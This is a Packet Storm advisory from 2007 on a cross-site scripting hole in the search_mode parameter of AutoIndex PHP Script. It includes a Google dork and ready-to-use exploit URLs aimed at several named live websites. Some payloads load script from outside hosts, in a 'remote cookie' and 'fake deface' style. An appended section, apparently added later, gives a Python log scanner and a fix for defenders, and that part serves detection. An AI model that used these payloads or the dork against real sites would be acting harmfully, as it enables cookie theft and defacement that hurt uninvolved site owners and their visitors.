autoindexXSS.txt

25 Aug 2007 | Reported by d3hydr8 | Type: packetstorm | Source: packetstormsecurity.com

Cross-site scripting vulnerability in the search_mode parameter of AutoIndex PHP Script, versions <= 2.2.1. Contact d3hydr8[at]gmail[dot]com for more info.


```
# Title : AutoIndex PHP Script search_mode Cross-Site Scripting Vulnerability
# Description : AutoIndex PHP Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
# Software : http://autoindex.sourceforge.net/
# Vuln. Version : <= 2.2.1
# Author : d3hydr8
# Contact : d3hydr8[at]gmail[dot]com
# Homepage : http://darkcode.h1x.com
# Original Post : http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=243
# Dork : intext:"Powered by AutoIndex PHP Script" or inurl:/AutoIndex/index.php
# Greets : mozi, whoami, icqbomber
# Proof :

Simple Alert:
http://www.flapjack.be/AutoIndex/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://www.projectopensky.com/files/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E
http://scizz.com/rhtools/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

Fake Deface:
http://buraaq.net/AutoIndex/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E
http://archsymb.com/ruby/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E

cookie:
http://boxorroxors.net/downloads.php?search=asdf&search_mode=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

remote cookie:
http://tor.meulie.net/index.php?&search=asdf&search_mode=%22%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3
```
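For operators of an affected install, the following added example (not part of the original advisory or of AutoIndex itself) scans web server access logs for requests whose `search_mode` value decodes to HTML metacharacters, the pattern every proof URL above shares. It assumes Apache/nginx combined log format; the log lines, IP addresses and the benign value `f` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Characters needed to break out of an HTML attribute or open a tag.
MARKUP = re.compile(r'[<>"\']')
# Request line inside a combined-format log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_search_mode(log_line):
    """Return the decoded search_mode value if it carries markup, else None."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name != "search_mode":
            continue
        # parse_qsl decodes once; decode again to catch double-encoded input.
        for candidate in (value, unquote(value)):
            if MARKUP.search(candidate):
                return candidate
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_search_mode(line)
        if value is not None:
            hits.append((n, value))
    return hits


# Constructed sample log lines (documentation IP ranges, placeholder paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2007:10:00:01 +0000] "GET /AutoIndex/index.php?search=readme&search_mode=f HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Aug/2007:10:00:09 +0000] "GET /AutoIndex/index.php?search=xss&search_mode=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E HTTP/1.1" 200 5301 "-" "Mozilla/5.0"',
    '203.0.113.4 - - [25/Aug/2007:10:00:15 +0000] "GET /AutoIndex/index.php?search=a&search_mode=%2522%253Cb%253E HTTP/1.1" 200 5290 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [25/Aug/2007:10:00:20 +0000] "GET /AutoIndex/index.php?dir=docs HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for lineno, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: search_mode={value!r}")
```

A hit shows that someone requested a crafted link, not that a visitor's browser executed it; the durable fix is HTML-encoding `search_mode` wherever the script writes it back into the page.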
